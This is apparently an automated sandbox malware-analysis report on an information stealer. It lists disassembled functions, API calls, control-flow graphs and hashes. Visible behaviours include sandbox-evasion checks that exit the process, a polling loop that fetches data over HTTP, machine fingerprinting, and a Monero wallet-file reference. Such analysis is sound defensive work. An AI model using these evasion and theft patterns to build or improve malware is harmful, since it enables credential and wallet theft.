                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: d2642b652b4baf44aad9eab66d6ad995b910738784057efdb7c84a050902d041
                  • Instruction ID: 374c07b6b46ec172802d9d7f9983b42979c41e2758c9cda8f62d052575212c01
                  • Opcode Fuzzy Hash: d2642b652b4baf44aad9eab66d6ad995b910738784057efdb7c84a050902d041
                  • Instruction Fuzzy Hash: 52621AB5500A01AFC36CDBA9F598D5637F9EF8C242714863EA62EC324CD67EA4C1DB50
                  Function 00FB6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 fb6280-fb630b call fca7a0 call fb47b0 call fca740 InternetOpenA StrCmpCA 1040 fb630d 1033->1040 1041 fb6314-fb6318 1033->1041 1040->1041 1042 fb6509-fb6525 call fca7a0 call fca800 * 2 1041->1042 1043 fb631e-fb6342 InternetConnectA 1041->1043 1061 fb6528-fb652d 1042->1061 1044 fb6348-fb634c 1043->1044 1045 fb64ff-fb6503 InternetCloseHandle 1043->1045 1048 fb635a 1044->1048 1049 fb634e-fb6358 1044->1049 1045->1042 1051 fb6364-fb6392 HttpOpenRequestA 1048->1051 1049->1051 1053 fb6398-fb639c 1051->1053 1054 fb64f5-fb64f9 InternetCloseHandle 1051->1054 1056 fb639e-fb63bf InternetSetOptionA 1053->1056 1057 fb63c5-fb6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 fb642c-fb644b call fc8940 1057->1059 1060 fb6407-fb6427 call fca740 call fca800 * 2 1057->1060 1067 fb64c9-fb64e9 call fca740 call fca800 * 2 1059->1067 1068 fb644d-fb6454 1059->1068 1060->1061 1067->1061 1071 fb64c7-fb64ef InternetCloseHandle 1068->1071 1072 fb6456-fb6480 InternetReadFile 1068->1072 1071->1054 1076 fb648b 1072->1076 1077 fb6482-fb6489 1072->1077 1076->1071 1077->1076 1080 fb648d-fb64c5 call fca9b0 call fca8a0 call fca800 1077->1080 1080->1072
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                    • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                  • StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB6303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                  • HttpOpenRequestA.WININET(00000000,GET,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB6385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FB63FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB646D
                  • InternetCloseHandle.WININET(00000000), ref: 00FB64EF
                  • InternetCloseHandle.WININET(00000000), ref: 00FB64F9
                  • InternetCloseHandle.WININET(00000000), ref: 00FB6503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 5fa7e091fc63e480b30b2cb6c74d33468b877813fcd4f175647735efb88bbe32
                  • Instruction ID: 910dbc133d20dedb80586d88d6c6fb1adb3fb88b228db10e67c409018384e9a2
                  • Opcode Fuzzy Hash: 5fa7e091fc63e480b30b2cb6c74d33468b877813fcd4f175647735efb88bbe32
                  • Instruction Fuzzy Hash: A1713C71A00218EBDB24DBA0DC49FEE7778BF44704F1081A9F10AAB1C4DBB96A85DF51
                  Function 00FC5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 fc5510-fc5577 call fc5ad0 call fca820 * 3 call fca740 * 4 1106 fc557c-fc5583 1090->1106 1107 fc5585-fc55b6 call fca820 call fca7a0 call fb1590 call fc51f0 1106->1107 1108 fc55d7-fc564c call fca740 * 2 call fb1590 call fc52c0 call fca8a0 call fca800 call fcaad0 StrCmpCA 1106->1108 1124 fc55bb-fc55d2 call fca8a0 call fca800 1107->1124 1133 fc5693-fc56a9 call fcaad0 StrCmpCA 1108->1133 1137 fc564e-fc568e call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1108->1137 1124->1133 1140 fc57dc-fc5844 call fca8a0 call fca820 * 2 call fb1670 call fca800 * 4 call fc6560 call fb1550 1133->1140 1141 fc56af-fc56b6 1133->1141 1137->1133 1272 fc5ac3-fc5ac6 1140->1272 1144 fc56bc-fc56c3 1141->1144 1145 fc57da-fc585f call fcaad0 StrCmpCA 1141->1145 1146 fc571e-fc5793 call fca740 * 2 call fb1590 call fc52c0 call fca8a0 call fca800 call fcaad0 StrCmpCA 1144->1146 1147 fc56c5-fc5719 call fca820 call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1144->1147 1165 fc5865-fc586c 1145->1165 1166 fc5991-fc59f9 call fca8a0 call fca820 * 2 call fb1670 call fca800 * 4 call fc6560 call fb1550 1145->1166 1146->1145 1250 fc5795-fc57d5 call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1146->1250 1147->1145 1167 fc598f-fc5a14 call fcaad0 StrCmpCA 1165->1167 1168 fc5872-fc5879 1165->1168 1166->1272 1197 fc5a28-fc5a91 call fca8a0 call fca820 * 2 call fb1670 call fca800 * 4 call fc6560 call fb1550 1167->1197 1198 fc5a16-fc5a21 Sleep 1167->1198 1174 fc587b-fc58ce call fca820 call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1168->1174 1175 fc58d3-fc5948 call fca740 * 2 call fb1590 call fc52c0 call fca8a0 call fca800 call fcaad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 fc594a-fc598a call fca7a0 call fb1590 call fc51f0 call fca8a0 call fca800 1175->1276 1197->1272 1198->1106 1250->1145 1276->1167
                  APIs
                    • Part of subcall function 00FCA820: lstrlen.KERNEL32(00FB4F05,?,?,00FB4F05,00FD0DDE), ref: 00FCA82B
                    • Part of subcall function 00FCA820: lstrcpy.KERNEL32(00FD0DDE,00000000), ref: 00FCA885
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC56A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5857
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5228
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5318
                    • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC532F
                    • Part of subcall function 00FC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00FC5364
                    • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC5383
                    • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC53AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00FC5A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 87c8293d430d93d12cda99f0dcf9cd6edf976be8d4e4790d9a45ef6d2894e754
                  • Instruction ID: 784de1447d2df7fed72fe1cd410ff1acad1d06a224a891ccbd3827cf0b66bc58
                  • Opcode Fuzzy Hash: 87c8293d430d93d12cda99f0dcf9cd6edf976be8d4e4790d9a45ef6d2894e754
                  • Instruction Fuzzy Hash: 1AE13E729101099BCB18FBA0EE57FED7338AF54704F44812CA416571D5EF38BA49EBA2
                  Function 00FC17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 fc17a0-fc17cd call fcaad0 StrCmpCA 1304 fc17cf-fc17d1 ExitProcess 1301->1304 1305 fc17d7-fc17f1 call fcaad0 1301->1305 1309 fc17f4-fc17f8 1305->1309 1310 fc17fe-fc1811 1309->1310 1311 fc19c2-fc19cd call fca800 1309->1311 1312 fc199e-fc19bd 1310->1312 1313 fc1817-fc181a 1310->1313 1312->1309 1315 fc185d-fc186e StrCmpCA 1313->1315 1316 fc187f-fc1890 StrCmpCA 1313->1316 1317 fc1835-fc1844 call fca820 1313->1317 1318 fc1970-fc1981 StrCmpCA 1313->1318 1319 fc18f1-fc1902 StrCmpCA 1313->1319 1320 fc1951-fc1962 StrCmpCA 1313->1320 1321 fc1932-fc1943 StrCmpCA 1313->1321 1322 fc1913-fc1924 StrCmpCA 1313->1322 1323 fc18ad-fc18be StrCmpCA 1313->1323 1324 fc18cf-fc18e0 StrCmpCA 1313->1324 1325 fc198f-fc1999 call fca820 1313->1325 1326 fc1849-fc1858 call fca820 1313->1326 1327 fc1821-fc1830 call fca820 1313->1327 1338 fc187a 1315->1338 1339 fc1870-fc1873 1315->1339 1340 fc189e-fc18a1 1316->1340 1341 fc1892-fc189c 1316->1341 1317->1312 1332 fc198d 1318->1332 1333 fc1983-fc1986 1318->1333 1346 fc190e 1319->1346 1347 fc1904-fc1907 1319->1347 1329 fc196e 1320->1329 1330 fc1964-fc1967 1320->1330 1350 fc194f 1321->1350 1351 fc1945-fc1948 1321->1351 1348 fc1926-fc1929 1322->1348 1349 fc1930 1322->1349 1342 fc18ca 1323->1342 1343 fc18c0-fc18c3 1323->1343 1344 fc18ec 1324->1344 1345 fc18e2-fc18e5 1324->1345 1325->1312 1326->1312 1327->1312 1329->1312 1330->1329 1332->1312 1333->1332 1338->1312 1339->1338 1355 fc18a8 1340->1355 1341->1355 1342->1312 1343->1342 1344->1312 1345->1344 1346->1312 1347->1346 1348->1349 1349->1312 1350->1312 1351->1350 1355->1312
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00FC17C5
                  • ExitProcess.KERNEL32 ref: 00FC17D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 99016862f2f99a61ba473ccf8b268f680097bb38514bfc8a9f48f3f50006eef0
                  • Instruction ID: 8ae2bc941910d0dcd0fa0b1f461809dd5693b03c33fe0b8bf2265d7efcad80e7
                  • Opcode Fuzzy Hash: 99016862f2f99a61ba473ccf8b268f680097bb38514bfc8a9f48f3f50006eef0
                  • Instruction Fuzzy Hash: 6E51ADB5A0020AEBCB04DFA0DA56FBE37B6BF45704F10404DE40AA7341DB74E961EB62
                  Function 00FC7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 fc7500-fc754a GetWindowsDirectoryA 1357 fc754c 1356->1357 1358 fc7553-fc75c7 GetVolumeInformationA call fc8d00 * 3 1356->1358 1357->1358 1365 fc75d8-fc75df 1358->1365 1366 fc75fc-fc7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 fc75e1-fc75fa call fc8d00 1365->1367 1369 fc7628-fc7658 wsprintfA call fca740 1366->1369 1370 fc7619-fc7626 call fca740 1366->1370 1367->1365 1377 fc767e-fc768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FC7542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FC757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC760A
                  • wsprintfA.USER32 ref: 00FC7640
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 186c4fd966f13d28e794d9c394a3db1100a680088ad5755af89cba24358b1045
                  • Instruction ID: 2712be0a69d85e1007cea3d592c4c9894c0f4f8c950142022b12f07c1e62627c
                  • Opcode Fuzzy Hash: 186c4fd966f13d28e794d9c394a3db1100a680088ad5755af89cba24358b1045
                  • Instruction Fuzzy Hash: 4A418FB1D04349ABDB10DB94DD46FEEBBB8AF48714F10019CF50967280DB78AA84DFA5
                  Function 00FC69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82320), ref: 00FC98A1
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C823E0), ref: 00FC98BA
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82440), ref: 00FC98D2
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82218), ref: 00FC98EA
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82350), ref: 00FC9903
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C88FD8), ref: 00FC991B
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C75DF0), ref: 00FC9933
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C75AF0), ref: 00FC994C
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C823B0), ref: 00FC9964
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C824E8), ref: 00FC997C
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82500), ref: 00FC9995
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C823F8), ref: 00FC99AD
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C75AD0), ref: 00FC99C5
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C824B8), ref: 00FC99DE
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FB11D0: ExitProcess.KERNEL32 ref: 00FB1211
                    • Part of subcall function 00FB1160: GetSystemInfo.KERNEL32(?), ref: 00FB116A
                    • Part of subcall function 00FB1160: ExitProcess.KERNEL32 ref: 00FB117E
                    • Part of subcall function 00FB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B
                    • Part of subcall function 00FB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132
                    • Part of subcall function 00FB1110: ExitProcess.KERNEL32 ref: 00FB1143
                    • Part of subcall function 00FB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E
                    • Part of subcall function 00FB1220: __aulldiv.LIBCMT ref: 00FB1258
                    • Part of subcall function 00FB1220: __aulldiv.LIBCMT ref: 00FB1266
                    • Part of subcall function 00FB1220: ExitProcess.KERNEL32 ref: 00FB1294
                    • Part of subcall function 00FC6770: GetUserDefaultLangID.KERNEL32 ref: 00FC6774
                    • Part of subcall function 00FB1190: ExitProcess.KERNEL32 ref: 00FB11C6
                    • Part of subcall function 00FC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                    • Part of subcall function 00FC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                    • Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                    • Part of subcall function 00FC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                    • Part of subcall function 00FC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                    • Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00FC6AF9
                  • Sleep.KERNEL32(00001770), ref: 00FC6B04
                  • CloseHandle.KERNEL32(?,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6B1A
                  • ExitProcess.KERNEL32 ref: 00FC6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 8f4e06549d4691621c896dfa246ecd627770b39dedce45e44480e27fc5f12819
                  • Instruction ID: b35c8548161423df7e642f36d339c121d77aba8d82cd1ddf829594c1ae7bec43
                  • Opcode Fuzzy Hash: 8f4e06549d4691621c896dfa246ecd627770b39dedce45e44480e27fc5f12819
                  • Instruction Fuzzy Hash: 53310B7190420EAADB18F7A0ED57FEE7778AF44304F50452CF212A21C1DF786945EBA6
                  Function 00FB1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1436 fb1220-fb1247 call fc89b0 GlobalMemoryStatusEx 1439 fb1249-fb1271 call fcda00 * 2 1436->1439 1440 fb1273-fb127a 1436->1440 1441 fb1281-fb1285 1439->1441 1440->1441 1443 fb129a-fb129d 1441->1443 1444 fb1287 1441->1444 1447 fb1289-fb1290 1444->1447 1448 fb1292-fb1294 ExitProcess 1444->1448 1447->1443 1447->1448
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E
                  • __aulldiv.LIBCMT ref: 00FB1258
                  • __aulldiv.LIBCMT ref: 00FB1266
                  • ExitProcess.KERNEL32 ref: 00FB1294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
